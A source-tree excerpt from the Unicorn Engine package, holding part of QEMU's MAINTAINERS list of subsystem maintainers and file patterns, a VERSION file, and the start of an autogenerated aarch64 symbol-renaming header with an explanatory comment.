S: Supported
F: util/async.c
F: util/aio-*.c
F: util/aio-*.h
F: util/fdmon-*.c
F: block/io.c
F: migration/block*
F: include/block/aio.h
F: include/block/aio-wait.h
F: scripts/qemugdb/aio.py
T: git https://github.com/stefanha/qemu.git block

Block SCSI subsystem
M: Paolo Bonzini <pbonzini@redhat.com>
R: Fam Zheng <fam@euphon.net>
L: qemu-block@nongnu.org
S: Supported
F: include/scsi/*
F: scsi/*

Block Jobs
M: John Snow <jsnow@redhat.com>
L: qemu-block@nongnu.org
S: Supported
F: blockjob.c
F: include/block/blockjob.h
F: job.c
F: job-qmp.c
F: include/qemu/job.h
F: block/backup.c
F: block/commit.c
F: block/stream.c
F: block/mirror.c
F: qapi/job.json
T: git https://github.com/jnsnow/qemu.git jobs

Block QAPI, monitor, command line
M: Markus Armbruster <armbru@redhat.com>
S: Supported
F: blockdev.c
F: blockdev-hmp-cmds.c
F: block/qapi.c
F: qapi/block*.json
F: qapi/transaction.json
T: git https://repo.or.cz/qemu/armbru.git block-next

Dirty Bitmaps
M: John Snow <jsnow@redhat.com>
R: Vladimir Sementsov-Ogievskiy <vsementsov@virtuozzo.com>
L: qemu-block@nongnu.org
S: Supported
F: include/qemu/hbitmap.h
F: include/block/dirty-bitmap.h
F: block/dirty-bitmap.c
F: block/qcow2-bitmap.c
F: migration/block-dirty-bitmap.c
F: util/hbitmap.c
F: tests/test-hbitmap.c
F: docs/interop/bitmaps.rst
T: git https://github.com/jnsnow/qemu.git bitmaps

Character device backends
M: Marc-André Lureau <marcandre.lureau@redhat.com>
R: Paolo Bonzini <pbonzini@redhat.com>
S: Maintained
F: chardev/
F: include/chardev/
F: qapi/char.json

Character Devices (Braille)
M: Samuel Thibault <samuel.thibault@ens-lyon.org>
S: Maintained
F: chardev/baum.c

Command line option argument parsing
M: Markus Armbruster <armbru@redhat.com>
S: Supported
F: include/qemu/option.h
F: tests/test-keyval.c
F: tests/test-qemu-opts.c
F: util/keyval.c
F: util/qemu-option.c

Coverity model
M: Markus Armbruster <armbru@redhat.com>
S: Supported
F: scripts/coverity-model.c

Coverity Scan integration
M: Peter Maydell <peter.maydell@linaro.org>
S: Maintained
F: scripts/coverity-scan/

Device Tree
M: Alistair Francis <alistair.francis@wdc.com>
R: David Gibson <david@gibson.dropbear.id.au>
S: Maintained
F: device_tree.c
F: include/sysemu/device_tree.h

Dump
S: Supported
M: Marc-André Lureau <marcandre.lureau@redhat.com>
F: dump/
F: hw/misc/vmcoreinfo.c
F: include/hw/misc/vmcoreinfo.h
F: include/qemu/win_dump_defs
F: include/sysemu/dump-arch.h
F: include/sysemu/dump.h
F: qapi/dump.json
F: scripts/dump-guest-memory.py
F: stubs/dump.c

Error reporting
M: Markus Armbruster <armbru@redhat.com>
S: Supported
F: include/qapi/error.h
F: include/qemu/error-report.h
F: qapi/error.json
F: util/error.c
F: util/qemu-error.c
F: scripts/coccinelle/err-bad-newline.cocci
F: scripts/coccinelle/error-use-after-free.cocci
F: scripts/coccinelle/error_propagate_null.cocci
F: scripts/coccinelle/remove_local_err.cocci
F: scripts/coccinelle/use-error_fatal.cocci

GDB stub
M: Alex Bennée <alex.bennee@linaro.org>
R: Philippe Mathieu-Daudé <philmd@redhat.com>
S: Maintained
F: gdbstub*
F: gdb-xml/

Memory API
M: Paolo Bonzini <pbonzini@redhat.com>
S: Supported
F: include/exec/ioport.h
F: ioport.c
F: include/exec/memop.h
F: include/exec/memory.h
F: include/exec/ram_addr.h
F: include/exec/ramblock.h
F: memory.c
F: include/exec/memory-internal.h
F: exec.c
F: scripts/coccinelle/memory-region-housekeeping.cocci

SPICE
M: Gerd Hoffmann <kraxel@redhat.com>
S: Supported
F: include/ui/qemu-spice.h
F: include/ui/spice-display.h
F: ui/spice-*.c
F: audio/spiceaudio.c
F: hw/display/qxl*
F: qapi/ui.json
F: docs/spice-port-fqdn.txt

Graphics
M: Gerd Hoffmann <kraxel@redhat.com>
S: Odd Fixes
F: ui/
F: include/ui/
F: qapi/ui.json
F: util/drm.c

Cocoa graphics
M: Peter Maydell <peter.maydell@linaro.org>
S: Odd Fixes
F: ui/cocoa.m

Main loop
M: Paolo Bonzini <pbonzini@redhat.com>
S: Maintained
F: cpus.c
F: include/qemu/main-loop.h
F: include/sysemu/runstate.h
F: util/main-loop.c
F: util/qemu-timer.c
F: softmmu/vl.c
F: softmmu/main.c
F: qapi/run-state.json

Human Monitor (HMP)
M: Dr. David Alan Gilbert <dgilbert@redhat.com>
S: Maintained
F: monitor/monitor-internal.h
F: monitor/misc.c
F: monitor/monitor.c
F: monitor/hmp*
F: hmp.h
F: hmp-commands*.hx
F: include/monitor/hmp-target.h
F: tests/qtest/test-hmp.c
F: include/qemu/qemu-print.h
F: util/qemu-print.c

Network device backends
M: Jason Wang <jasowang@redhat.com>
S: Maintained
F: net/
F: include/net/
F: qemu-bridge-helper.c
T: git https://github.com/jasowang/qemu.git net
F: qapi/net.json

Netmap network backend
M: Luigi Rizzo <rizzo@iet.unipi.it>
M: Giuseppe Lettieri <g.lettieri@iet.unipi.it>
M: Vincenzo Maffione <v.maffione@gmail.com>
W: http://info.iet.unipi.it/~luigi/netmap/
S: Maintained
F: net/netmap.c

Host Memory Backends
M: Eduardo Habkost <ehabkost@redhat.com>
M: Igor Mammedov <imammedo@redhat.com>
S: Maintained
F: backends/hostmem*.c
F: include/sysemu/hostmem.h
T: git https://github.com/ehabkost/qemu.git machine-next

Cryptodev Backends
M: Gonglei <arei.gonglei@huawei.com>
S: Maintained
F: include/sysemu/cryptodev*.h
F: backends/cryptodev*.c

Python scripts
M: Eduardo Habkost <ehabkost@redhat.com>
M: Cleber Rosa <crosa@redhat.com>
S: Odd fixes
F: python/qemu/*py
F: scripts/*.py
F: tests/*.py

Benchmark util
M: Vladimir Sementsov-Ogievskiy <vsementsov@virtuozzo.com>
S: Maintained
F: scripts/simplebench/

QAPI
M: Markus Armbruster <armbru@redhat.com>
M: Michael Roth <mdroth@linux.vnet.ibm.com>
S: Supported
F: qapi/
X: qapi/*.json
F: include/qapi/
X: include/qapi/qmp/
F: include/qapi/qmp/dispatch.h
F: tests/qapi-schema/
F: tests/test-*-visitor.c
F: tests/test-qapi-*.c
F: tests/test-qmp-*.c
F: tests/test-visitor-serialization.c
F: scripts/qapi-gen.py
F: scripts/qapi/*
F: docs/devel/qapi*
T: git https://repo.or.cz/qemu/armbru.git qapi-next

QAPI Schema
M: Eric Blake <eblake@redhat.com>
M: Markus Armbruster <armbru@redhat.com>
S: Supported
F: qapi/*.json
T: git https://repo.or.cz/qemu/armbru.git qapi-next

QObject
M: Markus Armbruster <armbru@redhat.com>
S: Supported
F: qobject/
F: include/qapi/qmp/
X: include/qapi/qmp/dispatch.h
F: scripts/coccinelle/qobject.cocci
F: tests/check-qdict.c
F: tests/check-qjson.c
F: tests/check-qlist.c
F: tests/check-qlit.c
F: tests/check-qnull.c
F: tests/check-qnum.c
F: tests/check-qobject.c
F: tests/check-qstring.c
F: tests/data/qobject/qdict.txt
T: git https://repo.or.cz/qemu/armbru.git qapi-next

QEMU Guest Agent
M: Michael Roth <mdroth@linux.vnet.ibm.com>
S: Maintained
F: qga/
F: docs/interop/qemu-ga.rst
F: scripts/qemu-guest-agent/
F: tests/test-qga.c
F: docs/interop/qemu-ga-ref.texi
T: git https://github.com/mdroth/qemu.git qga

QOM
M: Paolo Bonzini <pbonzini@redhat.com>
R: Daniel P. Berrange <berrange@redhat.com>
R: Eduardo Habkost <ehabkost@redhat.com>
S: Supported
F: docs/qdev-device-use.txt
F: hw/core/qdev*
F: include/hw/qdev*
F: include/monitor/qdev.h
F: include/qom/
F: qapi/qom.json
F: qapi/qdev.json
F: qdev-monitor.c
F: qom/
F: tests/check-qom-interface.c
F: tests/check-qom-proplist.c
F: tests/test-qdev-global-props.c

QMP
M: Markus Armbruster <armbru@redhat.com>
S: Supported
F: monitor/monitor-internal.h
F: monitor/qmp*
F: monitor/misc.c
F: monitor/monitor.c
F: qapi/error.json
F: docs/devel/*qmp-*
F: docs/interop/*qmp-*
F: scripts/qmp/
F: tests/qtest/qmp-test.c
F: tests/qtest/qmp-cmd-test.c
T: git https://repo.or.cz/qemu/armbru.git qapi-next

qtest
M: Thomas Huth <thuth@redhat.com>
M: Laurent Vivier <lvivier@redhat.com>
R: Paolo Bonzini <pbonzini@redhat.com>
S: Maintained
F: qtest.c
F: accel/qtest.c
F: tests/qtest/

Device Fuzzing
M: Alexander Bulekov <alxndr@bu.edu>
R: Paolo Bonzini <pbonzini@redhat.com>
R: Bandan Das <bsd@redhat.com>
R: Stefan Hajnoczi <stefanha@redhat.com>
S: Maintained
F: tests/qtest/fuzz/

Register API
M: Alistair Francis <alistair@alistair23.me>
S: Maintained
F: hw/core/register.c
F: include/hw/register.h
F: include/hw/registerfields.h

SLIRP
M: Samuel Thibault <samuel.thibault@ens-lyon.org>
S: Maintained
F: slirp/
F: net/slirp.c
F: include/net/slirp.h
T: git https://people.debian.org/~sthibault/qemu.git slirp

Stubs
M: Paolo Bonzini <pbonzini@redhat.com>
S: Maintained
F: stubs/

Tracing
M: Stefan Hajnoczi <stefanha@redhat.com>
S: Maintained
F: trace/
F: trace-events
F: docs/qemu-option-trace.rst.inc
F: scripts/tracetool.py
F: scripts/tracetool/
F: scripts/qemu-trace-stap*
F: docs/interop/qemu-trace-stap.rst
F: docs/devel/tracing.txt
T: git https://github.com/stefanha/qemu.git tracing

TPM
M: Stefan Berger <stefanb@linux.ibm.com>
S: Maintained
F: tpm.c
F: stubs/tpm.c
F: hw/tpm/*
F: include/hw/acpi/tpm.h
F: include/sysemu/tpm*
F: qapi/tpm.json
F: backends/tpm.c
F: tests/qtest/*tpm*
T: git https://github.com/stefanberger/qemu-tpm.git tpm-next

Checkpatch
S: Odd Fixes
F: scripts/checkpatch.pl

Migration
M: Juan Quintela <quintela@redhat.com>
M: Dr. David Alan Gilbert <dgilbert@redhat.com>
S: Maintained
F: hw/core/vmstate-if.c
F: include/hw/vmstate-if.h
F: include/migration/
F: migration/
F: scripts/vmstate-static-checker.py
F: tests/vmstate-static-checker-data/
F: tests/qtest/migration-test.c
F: docs/devel/migration.rst
F: qapi/migration.json

D-Bus
M: Marc-André Lureau <marcandre.lureau@redhat.com>
S: Maintained
F: backends/dbus-vmstate.c
F: tests/dbus-vmstate*
F: util/dbus.c
F: include/qemu/dbus.h
F: docs/interop/dbus.rst
F: docs/interop/dbus-vmstate.rst

Seccomp
M: Eduardo Otubo <otubo@redhat.com>
S: Supported
F: qemu-seccomp.c
F: include/sysemu/seccomp.h

Cryptography
M: Daniel P. Berrange <berrange@redhat.com>
S: Maintained
F: crypto/
F: include/crypto/
F: tests/test-crypto-*
F: tests/benchmark-crypto-*
F: tests/crypto-tls-*
F: tests/pkix_asn1_tab.c
F: qemu.sasl

Coroutines
M: Stefan Hajnoczi <stefanha@redhat.com>
M: Kevin Wolf <kwolf@redhat.com>
S: Maintained
F: util/*coroutine*
F: include/qemu/coroutine*
F: tests/test-coroutine.c

Buffers
M: Daniel P. Berrange <berrange@redhat.com>
S: Odd fixes
F: util/buffer.c
F: include/qemu/buffer.h

I/O Channels
M: Daniel P. Berrange <berrange@redhat.com>
S: Maintained
F: io/
F: include/io/
F: tests/test-io-*

User authorization
M: Daniel P. Berrange <berrange@redhat.com>
S: Maintained
F: authz/
F: qapi/authz.json
F: include/authz/
F: tests/test-authz-*

Sockets
M: Daniel P. Berrange <berrange@redhat.com>
M: Gerd Hoffmann <kraxel@redhat.com>
S: Maintained
F: include/qemu/sockets.h
F: util/qemu-sockets.c
F: qapi/sockets.json

File monitor
M: Daniel P. Berrange <berrange@redhat.com>
S: Odd fixes
F: util/filemonitor*.c
F: include/qemu/filemonitor.h
F: tests/test-util-filemonitor.c

Throttling infrastructure
M: Alberto Garcia <berto@igalia.com>
S: Supported
F: block/throttle-groups.c
F: include/block/throttle-groups.h
F: include/qemu/throttle*.h
F: util/throttle.c
F: docs/throttle.txt
F: tests/test-throttle.c
L: qemu-block@nongnu.org

UUID
M: Fam Zheng <fam@euphon.net>
S: Supported
F: util/uuid.c
F: include/qemu/uuid.h
F: tests/test-uuid.c

COLO Framework
M: zhanghailiang <zhang.zhanghailiang@huawei.com>
S: Maintained
F: migration/colo*
F: include/migration/colo.h
F: include/migration/failover.h
F: docs/COLO-FT.txt

COLO Proxy
M: Zhang Chen <chen.zhang@intel.com>
M: Li Zhijian <lizhijian@cn.fujitsu.com>
S: Supported
F: docs/colo-proxy.txt
F: net/colo*
F: net/filter-rewriter.c
F: net/filter-mirror.c

Record/replay
M: Pavel Dovgalyuk <pavel.dovgaluk@ispras.ru>
R: Paolo Bonzini <pbonzini@redhat.com>
W: https://wiki.qemu.org/Features/record-replay
S: Supported
F: replay/*
F: block/blkreplay.c
F: net/filter-replay.c
F: include/sysemu/replay.h
F: docs/replay.txt
F: stubs/replay.c

IOVA Tree
M: Peter Xu <peterx@redhat.com>
S: Maintained
F: include/qemu/iova-tree.h
F: util/iova-tree.c

elf2dmp
M: Viktor Prutyanov <viktor.prutyanov@phystech.edu>
S: Maintained
F: contrib/elf2dmp/

I2C and SMBus
M: Corey Minyard <cminyard@mvista.com>
S: Maintained
F: hw/i2c/core.c
F: hw/i2c/smbus_slave.c
F: hw/i2c/smbus_master.c
F: hw/i2c/smbus_eeprom.c
F: include/hw/i2c/i2c.h
F: include/hw/i2c/smbus_master.h
F: include/hw/i2c/smbus_slave.h
F: include/hw/i2c/smbus_eeprom.h

EDK2 Firmware
M: Laszlo Ersek <lersek@redhat.com>
M: Philippe Mathieu-Daudé <philmd@redhat.com>
S: Supported
F: pc-bios/descriptors/??-edk2-*.json
F: pc-bios/edk2-*
F: roms/Makefile.edk2
F: roms/edk2
F: roms/edk2-*
F: tests/data/uefi-boot-images/
F: tests/uefi-test-tools/
F: .gitlab-ci-edk2.yml
F: .gitlab-ci.d/edk2/

Usermode Emulation
------------------

Overall usermode emulation
M: Riku Voipio <riku.voipio@iki.fi>
S: Maintained
F: thunk.c
F: accel/tcg/user-exec*.c

BSD user
S: Orphan
F: bsd-user/
F: default-configs/*-bsd-user.mak

Linux user
M: Riku Voipio <riku.voipio@iki.fi>
R: Laurent Vivier <laurent@vivier.eu>
S: Maintained
F: linux-user/
F: default-configs/*-linux-user.mak
F: scripts/qemu-binfmt-conf.sh
F: scripts/update-syscalltbl.sh
F: scripts/update-mips-syscall-args.sh
F: scripts/gensyscalls.sh

Tiny Code Generator (TCG)
-------------------------

Common TCG code
M: Richard Henderson <rth@twiddle.net>
S: Maintained
F: tcg/
F: include/tcg/

TCG Plugins
M: Alex Bennée <alex.bennee@linaro.org>
S: Maintained
F: docs/devel/tcg-plugins.rst
F: plugins/
F: tests/plugin

AArch64 TCG target
M: Richard Henderson <richard.henderson@linaro.org>
S: Maintained
L: qemu-arm@nongnu.org
F: tcg/aarch64/
F: disas/arm-a64.cc
F: disas/libvixl/

ARM TCG target
M: Andrzej Zaborowski <balrogg@gmail.com>
S: Maintained
L: qemu-arm@nongnu.org
F: tcg/arm/
F: disas/arm.c

i386 TCG target
M: Richard Henderson <rth@twiddle.net>
S: Maintained
F: tcg/i386/
F: disas/i386.c

MIPS TCG target
M: Aleksandar Markovic <aleksandar.qemu.devel@gmail.com>
R: Aurelien Jarno <aurelien@aurel32.net>
R: Aleksandar Rikalo <aleksandar.rikalo@rt-rk.com>
S: Maintained
F: tcg/mips/

PPC TCG target
M: Richard Henderson <rth@twiddle.net>
S: Odd Fixes
F: tcg/ppc/
F: disas/ppc.c

RISC-V TCG target
M: Palmer Dabbelt <palmer@dabbelt.com>
M: Alistair Francis <Alistair.Francis@wdc.com>
L: qemu-riscv@nongnu.org
S: Maintained
F: tcg/riscv/
F: disas/riscv.c

S390 TCG target
M: Richard Henderson <rth@twiddle.net>
S: Maintained
F: tcg/s390/
F: disas/s390.c
L: qemu-s390x@nongnu.org

SPARC TCG target
S: Odd Fixes
F: tcg/sparc/
F: disas/sparc.c

TCI TCG target
M: Stefan Weil <sw@weilnetz.de>
S: Maintained
F: tcg/tci/
F: tcg/tci.c
F: disas/tci.c

Block drivers
-------------

VMDK
M: Fam Zheng <fam@euphon.net>
L: qemu-block@nongnu.org
S: Supported
F: block/vmdk.c

RBD
M: Jason Dillaman <dillaman@redhat.com>
L: qemu-block@nongnu.org
S: Supported
F: block/rbd.c

Sheepdog
M: Liu Yuan <namei.unix@gmail.com>
L: qemu-block@nongnu.org
L: sheepdog@lists.wpkg.org
S: Odd Fixes
F: block/sheepdog.c

VHDX
M: Jeff Cody <codyprime@gmail.com>
L: qemu-block@nongnu.org
S: Supported
F: block/vhdx*

VDI
M: Stefan Weil <sw@weilnetz.de>
L: qemu-block@nongnu.org
S: Maintained
F: block/vdi.c

iSCSI
M: Ronnie Sahlberg <ronniesahlberg@gmail.com>
M: Paolo Bonzini <pbonzini@redhat.com>
M: Peter Lieven <pl@kamp.de>
L: qemu-block@nongnu.org
S: Odd Fixes
F: block/iscsi.c
F: block/iscsi-opts.c

Network Block Device (NBD)
M: Eric Blake <eblake@redhat.com>
L: qemu-block@nongnu.org
S: Maintained
F: block/nbd*
F: nbd/
F: include/block/nbd*
F: qemu-nbd.*
F: blockdev-nbd.c
F: docs/interop/nbd.txt
F: docs/interop/qemu-nbd.rst
T: git https://repo.or.cz/qemu/ericb.git nbd

NFS
M: Peter Lieven <pl@kamp.de>
L: qemu-block@nongnu.org
S: Maintained
F: block/nfs.c

SSH
M: Richard W.M. Jones <rjones@redhat.com>
L: qemu-block@nongnu.org
S: Supported
F: block/ssh.c

CURL
L: qemu-block@nongnu.org
S: Odd Fixes
F: block/curl.c

GLUSTER
L: qemu-block@nongnu.org
L: integration@gluster.org
S: Odd Fixes
F: block/gluster.c

Null Block Driver
M: Fam Zheng <fam@euphon.net>
L: qemu-block@nongnu.org
S: Supported
F: block/null.c

NVMe Block Driver
M: Fam Zheng <fam@euphon.net>
L: qemu-block@nongnu.org
S: Supported
F: block/nvme*

Bootdevice
M: Gonglei <arei.gonglei@huawei.com>
S: Maintained
F: bootdevice.c

Quorum
M: Alberto Garcia <berto@igalia.com>
S: Supported
F: block/quorum.c
L: qemu-block@nongnu.org

blklogwrites
M: Ari Sundholm <ari@tuxera.com>
L: qemu-block@nongnu.org
S: Supported
F: block/blklogwrites.c

blkverify
M: Stefan Hajnoczi <stefanha@redhat.com>
L: qemu-block@nongnu.org
S: Supported
F: block/blkverify.c

bochs
M: Stefan Hajnoczi <stefanha@redhat.com>
L: qemu-block@nongnu.org
S: Supported
F: block/bochs.c

cloop
M: Stefan Hajnoczi <stefanha@redhat.com>
L: qemu-block@nongnu.org
S: Supported
F: block/cloop.c

dmg
M: Stefan Hajnoczi <stefanha@redhat.com>
L: qemu-block@nongnu.org
S: Supported
F: block/dmg.c

parallels
M: Stefan Hajnoczi <stefanha@redhat.com>
M: Denis V. Lunev <den@openvz.org>
L: qemu-block@nongnu.org
S: Supported
F: block/parallels.c
F: docs/interop/parallels.txt

qed
M: Stefan Hajnoczi <stefanha@redhat.com>
L: qemu-block@nongnu.org
S: Supported
F: block/qed.c

raw
M: Kevin Wolf <kwolf@redhat.com>
L: qemu-block@nongnu.org
S: Supported
F: block/linux-aio.c
F: include/block/raw-aio.h
F: block/raw-format.c
F: block/file-posix.c
F: block/file-win32.c
F: block/win32-aio.c

Linux io_uring
M: Aarushi Mehta <mehta.aaru20@gmail.com>
M: Julia Suvorova <jusual@redhat.com>
M: Stefan Hajnoczi <stefanha@redhat.com>
L: qemu-block@nongnu.org
S: Maintained
F: block/io_uring.c
F: stubs/io_uring.c

qcow2
M: Kevin Wolf <kwolf@redhat.com>
M: Max Reitz <mreitz@redhat.com>
L: qemu-block@nongnu.org
S: Supported
F: block/qcow2*
F: docs/interop/qcow2.txt

qcow
M: Kevin Wolf <kwolf@redhat.com>
L: qemu-block@nongnu.org
S: Supported
F: block/qcow.c

blkdebug
M: Kevin Wolf <kwolf@redhat.com>
M: Max Reitz <mreitz@redhat.com>
L: qemu-block@nongnu.org
S: Supported
F: block/blkdebug.c

vpc
M: Kevin Wolf <kwolf@redhat.com>
L: qemu-block@nongnu.org
S: Supported
F: block/vpc.c

vvfat
M: Kevin Wolf <kwolf@redhat.com>
L: qemu-block@nongnu.org
S: Supported
F: block/vvfat.c

Image format fuzzer
M: Stefan Hajnoczi <stefanha@redhat.com>
L: qemu-block@nongnu.org
S: Supported
F: tests/image-fuzzer/

Replication
M: Wen Congyang <wencongyang2@huawei.com>
M: Xie Changlong <xiechanglong.d@gmail.com>
S: Supported
F: replication*
F: block/replication.c
F: tests/test-replication.c
F: docs/block-replication.txt

PVRDMA
M: Yuval Shaia <yuval.shaia.ml@gmail.com>
M: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
S: Maintained
F: hw/rdma/*
F: hw/rdma/vmw/*
F: docs/pvrdma.txt
F: contrib/rdmacm-mux/*
F: qapi/rdma.json

Semihosting
M: Alex Bennée <alex.bennee@linaro.org>
S: Maintained
F: hw/semihosting/
F: include/hw/semihosting/

Build and test automation
-------------------------

Build and test automation
M: Alex Bennée <alex.bennee@linaro.org>
M: Fam Zheng <fam@euphon.net>
R: Philippe Mathieu-Daudé <philmd@redhat.com>
S: Maintained
F: .github/lockdown.yml
F: .travis.yml
F: scripts/travis/
F: .shippable.yml
F: tests/docker/
F: tests/vm/
F: scripts/archive-source.sh
W: https://travis-ci.org/qemu/qemu
W: https://app.shippable.com/github/qemu/qemu
W: http://patchew.org/QEMU/

FreeBSD Hosted Continuous Integration
M: Ed Maste <emaste@freebsd.org>
M: Li-Wen Hsu <lwhsu@freebsd.org>
S: Maintained
F: .cirrus.yml
W: https://cirrus-ci.com/github/qemu/qemu

GitLab Continuous Integration
M: Thomas Huth <thuth@redhat.com>
S: Maintained
F: .gitlab-ci.yml

Guest Test Compilation Support
M: Alex Bennée <alex.bennee@linaro.org>
R: Philippe Mathieu-Daudé <f4bug@amsat.org>
S: Maintained
F: tests/tcg/Makefile
F: tests/tcg/Makefile.include

Documentation
-------------

Build system architecture
M: Daniel P. Berrange <berrange@redhat.com>
S: Odd Fixes
F: docs/devel/build-system.txt

GIT Data Mining Config
M: Alex Bennée <alex.bennee@linaro.org>
S: Odd Fixes
F: gitdm.config
F: contrib/gitdm/*

Incompatible changes
R: libvir-list@redhat.com
F: docs/system/deprecated.rst

Build System
------------

GIT submodules
M: Daniel P. Berrange <berrange@redhat.com>
S: Odd Fixes
F: scripts/git-submodule.sh

UI translations
M: Aleksandar Markovic <aleksandar.qemu.devel@gmail.com>
F: po/*.po

Sphinx documentation configuration and build machinery
M: Peter Maydell <peter.maydell@linaro.org>
S: Maintained
F: docs/conf.py
F: docs/*/conf.py

unicorn-2.1.1/qemu/VERSION
5.0.1

unicorn-2.1.1/qemu/aarch64.h
/* Autogen header for Unicorn Engine - DONOT MODIFY */
#ifndef UNICORN_AUTOGEN_aarch64_H
#define UNICORN_AUTOGEN_aarch64_H
#ifndef UNICORN_ARCH_POSTFIX
#define UNICORN_ARCH_POSTFIX _aarch64
#endif
#define unicorn_fill_tlb unicorn_fill_tlb_aarch64
#define reg_read reg_read_aarch64
#define reg_write reg_write_aarch64
#define uc_init uc_init_aarch64
#define uc_add_inline_hook uc_add_inline_hook_aarch64
#define uc_del_inline_hook uc_del_inline_hook_aarch64
#define tb_invalidate_phys_range tb_invalidate_phys_range_aarch64
#define use_idiv_instructions use_idiv_instructions_aarch64
#define arm_arch arm_arch_aarch64
#define tb_target_set_jmp_target tb_target_set_jmp_target_aarch64
#define have_bmi1 have_bmi1_aarch64
#define have_popcnt have_popcnt_aarch64
#define have_avx1 have_avx1_aarch64
#define have_avx2 have_avx2_aarch64
#define have_isa have_isa_aarch64
#define have_altivec have_altivec_aarch64
#define have_vsx have_vsx_aarch64
#define flush_icache_range flush_icache_range_aarch64
#define s390_facilities s390_facilities_aarch64
#define tcg_dump_op tcg_dump_op_aarch64
#define tcg_dump_ops tcg_dump_ops_aarch64
#define tcg_gen_and_i64 tcg_gen_and_i64_aarch64
#define tcg_gen_discard_i64 tcg_gen_discard_i64_aarch64
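/*
 * Why these renames exist (a gloss on the generated list, kept as a C
 * comment so the header still preprocesses; the prototype below is
 * illustrative, not the real signature): Unicorn compiles the bundled
 * QEMU once per target and links all targets into a single library, so
 * every global symbol is suffixed with UNICORN_ARCH_POSTFIX (_aarch64
 * here) to avoid link-time collisions. For a symbol from the list above:
 *
 *     // shared source, compiled once per target:
 *     //     int reg_read(void *env, unsigned int regid, void *value);
 *     // with this header included, the preprocessor rewrites every
 *     // reference, so the object file exports:
 *     //     int reg_read_aarch64(void *env, unsigned int regid, void *value);
 *
 * and reg_read_aarch64 can coexist in one binary with, say,
 * reg_read_x86_64 from the corresponding x86_64 header.
 */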
#define tcg_gen_ld16s_i64 tcg_gen_ld16s_i64_aarch64
#define tcg_gen_ld16u_i64 tcg_gen_ld16u_i64_aarch64
#define tcg_gen_ld32s_i64 tcg_gen_ld32s_i64_aarch64
#define tcg_gen_ld32u_i64 tcg_gen_ld32u_i64_aarch64
#define tcg_gen_ld8s_i64 tcg_gen_ld8s_i64_aarch64
#define tcg_gen_ld8u_i64 tcg_gen_ld8u_i64_aarch64
#define tcg_gen_ld_i64 tcg_gen_ld_i64_aarch64
#define tcg_gen_mov_i64 tcg_gen_mov_i64_aarch64
#define tcg_gen_movi_i64 tcg_gen_movi_i64_aarch64
#define tcg_gen_mul_i64 tcg_gen_mul_i64_aarch64
#define tcg_gen_or_i64 tcg_gen_or_i64_aarch64
#define tcg_gen_sar_i64 tcg_gen_sar_i64_aarch64
#define tcg_gen_shl_i64 tcg_gen_shl_i64_aarch64
#define tcg_gen_shr_i64 tcg_gen_shr_i64_aarch64
#define tcg_gen_st_i64 tcg_gen_st_i64_aarch64
#define tcg_gen_xor_i64 tcg_gen_xor_i64_aarch64
#define cpu_icount_to_ns cpu_icount_to_ns_aarch64
#define cpu_is_stopped cpu_is_stopped_aarch64
#define cpu_get_ticks cpu_get_ticks_aarch64
#define cpu_get_clock cpu_get_clock_aarch64
#define cpu_resume cpu_resume_aarch64
#define qemu_init_vcpu qemu_init_vcpu_aarch64
#define cpu_stop_current cpu_stop_current_aarch64
#define resume_all_vcpus resume_all_vcpus_aarch64
#define vm_start vm_start_aarch64
#define address_space_dispatch_compact address_space_dispatch_compact_aarch64
#define flatview_translate flatview_translate_aarch64
#define address_space_translate_for_iotlb address_space_translate_for_iotlb_aarch64
#define qemu_get_cpu qemu_get_cpu_aarch64
#define cpu_address_space_init cpu_address_space_init_aarch64
#define cpu_get_address_space cpu_get_address_space_aarch64
#define cpu_exec_unrealizefn cpu_exec_unrealizefn_aarch64
#define cpu_exec_initfn cpu_exec_initfn_aarch64
#define cpu_exec_realizefn cpu_exec_realizefn_aarch64
#define tb_invalidate_phys_addr tb_invalidate_phys_addr_aarch64
#define cpu_watchpoint_insert cpu_watchpoint_insert_aarch64
#define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_aarch64
#define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_aarch64
#define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_aarch64
#define cpu_breakpoint_insert cpu_breakpoint_insert_aarch64
#define cpu_breakpoint_remove cpu_breakpoint_remove_aarch64
#define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_aarch64
#define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_aarch64
#define cpu_abort cpu_abort_aarch64
#define cpu_physical_memory_test_and_clear_dirty cpu_physical_memory_test_and_clear_dirty_aarch64
#define memory_region_section_get_iotlb memory_region_section_get_iotlb_aarch64
#define flatview_add_to_dispatch flatview_add_to_dispatch_aarch64
#define qemu_ram_get_host_addr qemu_ram_get_host_addr_aarch64
#define qemu_ram_get_offset qemu_ram_get_offset_aarch64
#define qemu_ram_get_used_length qemu_ram_get_used_length_aarch64
#define qemu_ram_is_shared qemu_ram_is_shared_aarch64
#define qemu_ram_pagesize qemu_ram_pagesize_aarch64
#define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_aarch64
#define qemu_ram_alloc qemu_ram_alloc_aarch64
#define qemu_ram_free qemu_ram_free_aarch64
#define qemu_map_ram_ptr qemu_map_ram_ptr_aarch64
#define qemu_ram_block_host_offset qemu_ram_block_host_offset_aarch64
#define qemu_ram_block_from_host qemu_ram_block_from_host_aarch64
#define qemu_ram_addr_from_host qemu_ram_addr_from_host_aarch64
#define cpu_check_watchpoint cpu_check_watchpoint_aarch64
#define iotlb_to_section iotlb_to_section_aarch64
#define address_space_dispatch_new address_space_dispatch_new_aarch64
#define address_space_dispatch_free address_space_dispatch_free_aarch64
#define flatview_read_continue flatview_read_continue_aarch64
#define address_space_read_full address_space_read_full_aarch64
#define address_space_write address_space_write_aarch64
#define address_space_rw address_space_rw_aarch64
#define cpu_physical_memory_rw cpu_physical_memory_rw_aarch64
#define address_space_write_rom address_space_write_rom_aarch64
#define cpu_flush_icache_range cpu_flush_icache_range_aarch64
#define cpu_exec_init_all cpu_exec_init_all_aarch64
#define address_space_access_valid address_space_access_valid_aarch64
#define address_space_map address_space_map_aarch64
#define address_space_unmap address_space_unmap_aarch64
#define cpu_physical_memory_map cpu_physical_memory_map_aarch64
#define cpu_physical_memory_unmap cpu_physical_memory_unmap_aarch64
#define cpu_memory_rw_debug cpu_memory_rw_debug_aarch64
#define qemu_target_page_size qemu_target_page_size_aarch64
#define qemu_target_page_bits qemu_target_page_bits_aarch64
#define qemu_target_page_bits_min qemu_target_page_bits_min_aarch64
#define target_words_bigendian target_words_bigendian_aarch64
#define cpu_physical_memory_is_io cpu_physical_memory_is_io_aarch64
